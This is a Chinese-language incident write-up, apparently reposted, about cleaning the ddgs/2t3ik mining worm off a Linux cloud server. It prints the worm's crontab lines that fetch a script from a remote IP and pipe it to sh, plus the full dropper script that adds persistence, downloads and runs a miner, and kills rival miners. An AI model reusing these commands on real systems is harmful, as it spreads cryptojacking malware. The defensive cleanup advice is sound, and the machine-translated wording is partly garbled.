2t3ik与ddgs挖矿病毒处理ITeye - 超凡娱乐

2t3ik与ddgs挖矿病毒处理ITeye

2019年03月28日08时54分14秒 | 作者: 海白 | 标签: 暗码,病毒,发现 | 浏览: 2698

一、问题现象
朋友的阿里云LINUX效劳器, 发现有2t3ik与ddgs两个反常进程,把CPU简直耗尽了。其描绘kill掉今后,过一瞬间又会从头呈现。

2t3ik_worm

二、剖析处理
即然kill 后过一瞬间又会呈现,那就有两种或许:1、crontab守时调用;2、有看护进程,单个病毒还会修正ps和top,经过这些指令无法查看到躲藏的看护进程。先看了下crontab,发现如下两条内容:

*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh
*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh 
查询了下165.225.157.157这个IP来自美国拉斯维加斯。获取了下i.sh脚本,发现内容如下:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddgs.3011" ]; then
  curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.i686 -o /tmp/ddgs.3011
fi
chmod +x /tmp/ddgs.3011 /tmp/ddgs.3011
ps auxf | grep -v grep | grep Circle_MI | awk {print $2} | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk {print $2} | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk {print $2} | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk {print $2} | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk {print $2} | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk {print $2} | xargs kill
简略的一个shell 脚本,前面是创立crontab守时使命,后边下面了ddgs.i686程序并履行。能够确认便是这个来自美国的国际友人的程序干的坏事了。

删去crontab内容,并kill 掉相关进程后,调查一段时间发现其不再从头呈现。问题解决。当然,为防止其后边再呈现,能够做以下防备操作:

cd /tmp/
rm -rf 2t3ik.p
rm -rf ddgs.3011
touch 2t3ik.p
touch ddgs.3011
chattr +i 2t3ik*
chattr +i ddgs*
三、发生原因
网上也找了下该病毒的相关信息,了解到其一般是因为装置了redis后,未设置暗码或暗码过分简略,导致的被侵略。redis暗码修正办法如下:

redis-cli -h 127.0.0.1 -p 6379
config get requirepass //获取当时暗码
config set requirepass "yourpassword"//设置当时暗码,效劳从头启动后又会置为默许,即无暗码;
永久收效办法为,翻开redis配置文件redis.conf,找到requirepass值修正暗码,如下:

requirepass yourpassword  //此处留意,行前不能有空格
别的,平常仍是主张装置chkrootkit、rkhunter、Lynis、ISPProtect这类安全东西,定时做扫描。
版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表超凡娱乐立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章